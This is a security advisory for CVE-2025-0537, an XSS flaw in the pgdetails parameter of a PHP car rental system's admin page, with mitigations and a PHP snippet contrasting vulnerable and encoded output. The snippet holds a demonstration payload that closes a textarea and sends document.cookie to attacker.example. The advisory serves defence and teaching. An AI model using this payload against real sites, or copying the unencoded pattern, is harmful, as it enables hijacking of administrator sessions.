Platform: php
Component: my-cves
Fixed in: 1.0.1
A cross-site scripting (XSS) vulnerability, rated problematic, has been identified in the code-projects Car Rental Management System, affecting version 1.0. The flaw allows an attacker to inject script through the pgdetails argument handled by the /admin/manage-pages.php file. Successful exploitation could lead to session hijacking or defacement of the administrative interface. The vulnerability is fixed in version 1.0.1.
The XSS vulnerability lets an attacker inject arbitrary JavaScript that is executed in the browser of whoever loads the affected page. Because that page sits under /admin/, the user loading it is normally an authenticated administrator, so the injected script runs inside the administrator's session and can act on the application as that administrator: read the session cookie (unless it is marked HttpOnly), issue requests that modify data or create new users, redirect the administrator to a malicious site, or alter the content of the page. The attacker does not obtain the administrator's password; what they obtain is the ability to drive the administrator's live browser session, which for most admin panels amounts to the same thing. The impact is amplified if the administrative interface handles sensitive data or controls critical system functions.
This vulnerability has been publicly disclosed, which increases the risk of exploitation. It is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog and its EPSS score (listed below) is low, but a public proof-of-concept may emerge and make exploitation easier. The CVE was published on 2025-01-17.
Exploit Status
EPSS: 0.14% (33rd percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2025-0537 is to upgrade Car Rental Management System to version 1.0.1 or later, which contains the fix. If upgrading is not immediately feasible, apply context-aware output encoding wherever the pgdetails value is written into the HTML produced by /admin/manage-pages.php (in PHP, htmlspecialchars with ENT_QUOTES). Input validation on its own is not a reliable XSS defence, since legitimate page content may need characters such as < and ", so treat it as a supplementary measure. Mark the session cookie HttpOnly (the session.cookie_httponly setting) so that injected script cannot read it, and consider a Content Security Policy that disallows inline script as defence in depth. A Web Application Firewall with XSS rules can block common payloads but is a stopgap, not a fix. Regularly review how user-supplied data is rendered to prevent similar vulnerabilities from being introduced in the future.
Update the Car Rental Management System to version 1.0.1, which fixes the XSS vulnerability in the manage-pages.php file. If the patched version cannot be deployed yet, encode the pgdetails value at the point where manage-pages.php outputs it (and filter the input as an additional measure) so that injected JavaScript is rendered as text rather than executed.
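The following PHP snippet is an added illustration of the vulnerable pattern and its fix; it is not code from the code-projects Car Rental Management System. It assumes only what the advisory states (a request parameter named pgdetails that is echoed into the admin page); the function names, the HTML wrapper and the demonstration payload are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example, not code from the Car Rental Management System project.
// It reproduces the general shape of the flaw described for
// /admin/manage-pages.php: a request parameter (pgdetails) written into HTML
// without encoding. The parameter name is from the advisory; the function
// names and the textarea wrapper are hypothetical.

/** Vulnerable pattern: the raw parameter is concatenated straight into HTML. */
function render_page_details_vulnerable(string $pgdetails): string
{
    return '<textarea name="pgdetails">' . $pgdetails . '</textarea>';
}

/**
 * Hardened pattern: encode at the point of output, for the HTML context.
 * ENT_QUOTES also encodes ' and " so the same helper is safe inside attributes;
 * ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
 */
function render_page_details_hardened(string $pgdetails): string
{
    $safe = htmlspecialchars($pgdetails, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<textarea name="pgdetails">' . $safe . '</textarea>';
}

/**
 * Check used by the demonstration: after stripping the static wrapper, does the
 * interpolated value still contain an unencoded '<'? Correctly encoded output
 * never does, so any '<' means a tag could be parsed by the browser.
 */
function interpolated_value_has_raw_tag(string $html): bool
{
    $inner = preg_replace('#^<textarea name="pgdetails">|</textarea>$#', '', $html);
    return $inner !== null && strpos($inner, '<') !== false;
}

// Constructed demonstration payload (not taken from the advisory): it closes
// the textarea and injects a script that sends document.cookie to a third party.
$payload = '</textarea><script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

$vulnerable = render_page_details_vulnerable($payload);
$hardened   = render_page_details_hardened($payload);

printf("vulnerable output contains a live tag: %s\n", interpolated_value_has_raw_tag($vulnerable) ? 'yes' : 'no');
printf("hardened output contains a live tag:   %s\n", interpolated_value_has_raw_tag($hardened) ? 'yes' : 'no');
echo $hardened, PHP_EOL;
```

The same helper applies to any other place where pgdetails (or any request value) is echoed; the encoding must match the output context, so a value placed inside a JavaScript string or a URL needs different treatment than one placed in HTML text.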
CVE-2025-0537 is a cross-site scripting (XSS) vulnerability in Car Rental Management System version 1.0 that allows attackers to inject malicious scripts via the pgdetails parameter of the /admin/manage-pages.php file.
You are affected if you are using Car Rental Management System version 1.0. Upgrade to version 1.0.1 to mitigate the risk.
Upgrade Car Rental Management System to version 1.0.1 or later. Implement input validation and output encoding as a temporary workaround.
The vulnerability has been publicly disclosed, increasing the likelihood of exploitation. Monitor web server logs for requests to /admin/manage-pages.php whose pgdetails value contains script-like content (for example < or javascript:), and review administrator activity for unexpected changes or new accounts.
Refer to the code-projects website or relevant security mailing lists for the official advisory regarding CVE-2025-0537.